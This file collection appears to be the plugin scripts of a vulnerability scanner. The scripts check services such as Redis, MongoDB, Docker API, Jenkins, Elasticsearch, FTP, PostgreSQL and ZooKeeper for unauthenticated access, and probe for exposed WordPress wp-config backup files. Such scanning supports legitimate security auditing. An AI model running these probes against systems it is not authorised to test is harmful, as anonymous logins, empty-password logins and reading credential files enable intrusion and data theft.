--------------------------------------------------------------------------------
/scripts/unauthorized_access_Hadoop_yarn.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # Hadoop yarn unauthorized access
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 | from config.setting import default_headers
10 |
11 | ports_to_check = 8088 # default port to scan
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 8088
18 | if self.scheme == 'Hadoop yarn' and self.port != 8088: # non-standard port
19 | port = self.port
20 | elif 8088 not in self.ports_open:
21 | return
22 |
23 | try:
24 | url = 'http://' + self.host + ':' + str(port) + '/ws/v1/cluster/info'
25 | r = requests.get(url, timeout=5, verify=False, headers = default_headers)
26 | if 'resourceManagerVersionBuiltOn' in r.content.decode() or 'hadoopVersion' in r.content.decode():
27 | save_script_result(self, '', 'http://%s:%s/ws/v1/cluster/info' % (self.host, port), 'Hadoop yarn Unauthorized Access')
28 | except Exception as e:
29 | pass
30 |
31 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_docker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # docker api unauthorized access
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 | from config.setting import default_headers
10 |
11 | ports_to_check = 2375 # default port to scan
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 2375
18 | if self.scheme == 'docker api' and self.port != 2375: # non-standard port
19 | port = self.port
20 | elif 2375 not in self.ports_open:
21 | return
22 |
23 | try:
24 | url = 'http://' + self.host + ':' + str(port) + '/version'
25 | r = requests.get(url, timeout=5, verify=False, headers = default_headers)
26 | if 'ApiVersion' in r.content.decode():
27 | save_script_result(self, '', 'http://%s:%s/version' % (self.host, port), 'docker api Unauthorized Access')
28 | except Exception as e:
29 | pass
30 |
31 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_docker_registry_api.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # docker registry api unauthorized access
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 |
10 | ports_to_check = 30000 # default port to scan
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 30000
17 | if self.scheme == 'docker api' and self.port != 30000: # non-standard port
18 | port = self.port
19 | elif 30000 not in self.ports_open:
20 | return
21 |
22 | try:
23 | r0 = requests.get(f"http://{self.host}:{port}/v2/_catalog", timeout=5, verify=False)
24 |
25 | if "repositories" in r0.text:
26 | save_script_result(self, '', 'http://%s:%s/v2/_catalog' % (self.host, port), 'docker registry api Unauthorized Access')
27 | return
28 | r = requests.get(f"http://{self.host}:{port}/v1/_catalog", timeout=5, verify=False)
29 | if "repositories" in r.text:
30 | save_script_result(self, '', 'http://%s:%s/v1/_catalog' % (self.host, port), 'docker registry api Unauthorized Access')
31 | return
32 |
33 | except Exception as e:
34 | pass
35 |
36 |
37 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_elasticsearch.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # Elasticsearch unauthorized access
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 |
10 |
11 | ports_to_check = 9200 # default port to scan
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 9200
18 | if self.scheme == 'elasticsearch' and self.port != 9200: # non-standard port
19 | port = self.port
20 | elif 9200 not in self.ports_open:
21 | return
22 | try:
23 | url = 'http://' + self.host + ':' + str(port) + '/_cat'
24 | r = requests.get(url, timeout=5)
25 | if '/_cat/master' in r.content.decode():
26 | save_script_result(self, '', 'http://%s:%s/_cat' % (self.host, port), 'Elasticsearch Unauthorized Access')
27 | except Exception as e:
28 | pass
29 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_ftp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # FTP unauthorized access
6 |
7 | import ftplib
8 | from lib.common.utils import save_script_result
9 |
10 | ports_to_check = 21 # default port to scan
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 21
17 | if self.scheme == 'ftp' and self.port != 21: # non-standard port
18 | port = self.port
19 | elif 21 not in self.ports_open:
20 | return
21 |
22 | try:
23 | ftp = ftplib.FTP()
24 | ftp.connect(self.host, port, timeout=5) # connect to the target FTP server and port
25 | ftp.login('anonymous', 'Aa@12345678')
26 | save_script_result(self, '', 'ftp://%s:%s/' % (self.host, port), 'FTP Unauthorized Access')
27 | except Exception as e:
28 | pass
29 |
30 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_jboss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # JBoss unauthorized access
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 |
10 | ports_to_check = 8080 # default port to scan
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 8080
17 | if self.scheme == 'jboss' and self.port != 8080: # non-standard port
18 | port = self.port
19 | elif 8080 not in self.ports_open:
20 | return
21 | try:
22 | url = 'http://' + self.host + ':' + str(port) + '/jmx-console/HtmlAdaptor?action=displayMBeans'
23 | r = requests.get(url, timeout=5)
24 | if 'JBoss JMX Management Console' in r.content.decode() and r.status_code == 200 and 'jboss' in r.content.decode():
25 | save_script_result(self, '', 'http://%s:%s/jmx-console/HtmlAdaptor?action=displayMBeans' % (self.host, port), 'JBoss Unauthorized Access')
26 | except Exception as e:
27 | pass
28 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_jenkins.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # Jenkins unauthorized access
6 |
7 | import requests
8 | from lib.common.utils import save_script_result
9 |
10 |
11 | ports_to_check = 8080 # default port to scan
12 |
13 |
14 | def do_check(self, url):
15 | if url != '/':
16 | return
17 | port = 8080
18 | if self.scheme == 'jenkins' and self.port != 8080: # non-standard port
19 | port = self.port
20 | elif 8080 not in self.ports_open:
21 | return
22 | try:
23 | url = 'http://' + self.host + ':' + str(port) + '/systemInfo'
24 | r = requests.get(url, timeout=5)
25 | if 'jenkins.war' in r.content.decode() and 'JENKINS_HOME' in r.content.decode():
26 | save_script_result(self, '', 'http://%s:%s/systemInfo' % (self.host, port), 'jenkins Unauthorized Access')
27 | except Exception as e:
28 | pass
29 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_memcached.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # Memcached unauthorized access
6 |
7 | import socket
8 | from lib.common.utils import save_script_result
9 |
10 | ports_to_check = 11211 # default port to scan
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 11211
17 | if self.scheme == 'memcached' and self.port != 11211: # non-standard port
18 | port = self.port
19 | elif 11211 not in self.ports_open:
20 | return
21 | try:
22 | socket.setdefaulttimeout(5)
23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24 | s.connect((self.host, port))
25 | s.send(bytes('stats\r\n', 'UTF-8'))
26 | if 'version' in s.recv(1024).decode():
27 | save_script_result(self, '', 'memcached://%s:%s' % (self.host, port), 'Memcached Unauthorized Access')
28 | s.close()
29 | except Exception as e:
30 | pass
31 | finally:
32 | s.close()
33 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_mongodb.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- encoding: utf-8 -*-
3 |
4 | # MongoDB unauthorized access
5 |
6 | import pymongo
7 | from lib.common.utils import save_script_result
8 |
9 |
10 | ports_to_check = 27017 # default port to scan
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 27017
17 | if self.scheme == 'mongodb' and self.port != 27017: # non-standard port
18 | port = self.port
19 | elif 27017 not in self.ports_open:
20 | return
21 |
22 | try:
23 | conn = pymongo.MongoClient(host=self.host, port=port, connectTimeoutMS=5000, socketTimeoutMS=5000)
24 | database_list = conn.list_database_names()
25 | if not database_list:
26 | conn.close()
27 | return
28 | detail = "%s MongoDB Unauthorized Access : %s" % (self.host, ",".join(database_list))
29 | conn.close()
30 | save_script_result(self, '', 'mongodb://%s:%s' % (self.host, port), detail)
31 | except Exception as e:
32 | pass
33 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_postgresb.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- encoding: utf-8 -*-
3 |
4 | # PostgreSQL empty-password access
5 | import psycopg2
6 | from lib.common.utils import save_script_result
7 |
8 |
9 | ports_to_check = 5432 # default port to scan
10 |
11 |
12 | def do_check(self, url):
13 | if url != '/':
14 | return
15 | port = 5432
16 | if self.scheme == 'PostgreSQL' and self.port != 5432: # non-standard port
17 | port = self.port
18 | elif 5432 not in self.ports_open:
19 | return
20 |
21 | try:
22 | conn = psycopg2.connect(database="postgres", user="postgres", password="", host=self.host, port=port)
23 | save_script_result(self, '', 'postgresql://%s:%s' % (self.host, port), '', 'PostgreSQL empty password')
24 | except Exception as e:
25 | pass
26 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_redis.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- encoding: utf-8 -*-
3 |
4 | # Redis unauthorized access
5 | import socket
6 | from lib.common.utils import save_script_result
7 |
8 |
9 | ports_to_check = 6379 # default port to scan; the framework checks whether it is open
10 |
11 |
12 | def do_check(self, url):
13 | if url != '/':
14 | return
15 | port = 6379
16 | # Non-standard port: no need to check whether 6379 is open.
17 | # Targets like redis://test.ip:16379 are supported for scanning a Redis service on a non-standard port
18 | if self.scheme == 'redis' and self.port != 6379:
19 | port = self.port
20 | elif 6379 not in self.ports_open:
21 | return
22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | s.settimeout(3)
24 | try:
25 | s.connect((self.host, port))
26 | # payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
27 | # s.send(payload)
28 | s.send(bytes("INFO\r\n", 'UTF-8'))
29 | data = s.recv(1024).decode()
30 | s.close()
31 | if "redis_version" in data:
32 | save_script_result(self, '', 'redis://%s:%s' % (self.host, port), 'Redis Unauthorized Access')
33 | except Exception as e:
34 | s.close()
35 |
36 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_rsync.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- encoding: utf-8 -*-
3 |
4 | # rsync unauthorized access
5 | import socket
6 | from lib.common.utils import save_script_result
7 |
8 |
9 | ports_to_check = 873 # default port to scan; the framework checks whether it is open
10 |
11 |
12 | def do_check(self, url):
13 | if url != '/':
14 | return
15 | port = 873
16 | # non-standard port: no need to check whether the default port is open
17 | if self.scheme == 'rsync' and self.port != 873:
18 | port = self.port
19 | elif 873 not in self.ports_open:
20 | return
21 |
22 | try:
23 | socket.setdefaulttimeout(5)
24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
25 | s.connect((self.host, port))
26 | s.send(bytes("", 'UTF-8'))
27 | result = s.recv(1024).decode()
28 | # print(result)
29 | if "RSYNCD" in result:
30 | save_script_result(self, '', 'rsync://%s:%s' % (self.host, port), 'Rsync Unauthorized Access')
31 | except Exception as e:
32 | s.close()
33 |
34 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_zookeeper.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 |
3 | # ZooKeeper unauthorized access
4 |
5 | import socket
6 | from lib.common.utils import save_script_result
7 |
8 | ports_to_check = 2181 # default service port
9 |
10 |
11 | def do_check(self, url):
12 | if url != '/':
13 | return
14 | port = 2181
15 | if self.scheme == 'zookeeper' and self.port != 2181: # non-standard port
16 | port = self.port
17 | elif 2181 not in self.ports_open:
18 | return
19 |
20 | try:
21 | socket.setdefaulttimeout(5)
22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | s.connect((self.host, port))
24 | s.send(bytes('envi', 'UTF-8'))
25 | data = s.recv(1024).decode()
26 | if 'Environment' in data:
27 | save_script_result(self, '', 'zookeeper://%s:%s' % (self.host, port), '', 'Zookeeper Unauthorized Access')
28 | except Exception as e:
29 | pass
30 | finally:
31 | s.close()
32 |
--------------------------------------------------------------------------------
/scripts/wordpress_backup_file.py:
--------------------------------------------------------------------------------
1 | # Wordpress
2 |
3 | from lib.common.utils import save_script_result
4 |
5 |
6 | def do_check(self, url):
7 | if url == '/' and self.session:
8 | if self.index_html_doc.find('/wp-content/themes/') >= 0:
9 | url_lst = ['/wp-config.php.inc',
10 | '/wp-config.inc',
11 | '/wp-config.bak',
12 | '/wp-config.php~',
13 | '/.wp-config.php.swp',
14 | '/wp-config.php.bak']
15 | for _url in url_lst:
16 | status, headers, html_doc = self.http_request(_url)
17 | if status == 200 or status == 206:
18 | if html_doc.find('<?php') >= 0:
19 | save_script_result(self, status, self.base_url + _url, '', 'WordPress Backup File Found')
20 |
--------------------------------------------------------------------------------